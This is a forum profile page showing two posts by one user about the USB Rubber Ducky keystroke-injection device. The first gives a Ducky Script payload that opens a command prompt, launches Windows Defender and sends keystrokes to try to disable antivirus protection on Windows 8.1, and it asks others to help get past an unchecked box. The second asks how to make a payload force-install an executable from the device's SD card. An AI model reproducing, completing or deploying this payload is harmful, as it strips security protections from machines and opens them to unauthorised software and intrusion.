Jump to content

Hobbes_

Active Members
  • Posts

    9
  • Joined

  • Last visited

Posts posted by Hobbes_

  1. Hello all,

    I've put together a simple script that attempts to disable Windows Defender on Windows 8.1 (will update to 7 later).

    My only problem is that I have an issue where there is a check box titled "turn on this app" and when I tab over to it, there is no way for me to uncheck that selection. I hope that someone might either find a work around to my method or find a way to make it work. Thank you

    Disable Windows Defender:

    REM  Author        : Hobbes
    REM  Description   : Attempts to disable Windows Defender anti-virus. 
    REM  Note          : Only tested on Windows 8.1 - Windows 7 compatibility unknown.
    
    REM ***[Initial Delay]***
    DELAY 3000
    
    REM ***[Navigate to Windows Defender]***
    GUI r
    DELAY 250
    STRING cmd
    ENTER
    DELAY 800
    STRING start "" "C:\Program Files\Windows Defender\MSASCui.exe"
    ENTER
    DELAY 400
    
    REM **[Disables Defender]***
    TAB
    DELAY 80
    TAB
    DELAY 80
    RIGHTARROW
    DELAY 80
    RIGHTARROW
    DELAY 80
    RIGHTARROW
    DELAY 80
    TAB
    DELAY 80
    DOWNARROW
    DELAY 80
    DOWNARROW
    DELAY 80
    DOWNARROW
    DELAY 80
    DOWNARROW
    DELAY 80
    DOWNARROW
    DELAY 80
    DOWNARROW
    DELAY 80
    TAB
  2. I have heard a lot about the USB rubber ducky and I have just recently purchased one. I am waiting for it to come in the mail so I haven't had any time to play around with one yet. I have been thinking ahead with what I might want to do with my rubber ducky and I am wondering if there is a way that I can have an exe file on the micro sd and have the payload force install that file. I think I read somewhere that if I want a payload to interact with files on the SD I would need to use twin duck? How would I do that? Please make the explanation noob friendly!

×
×
  • Create New...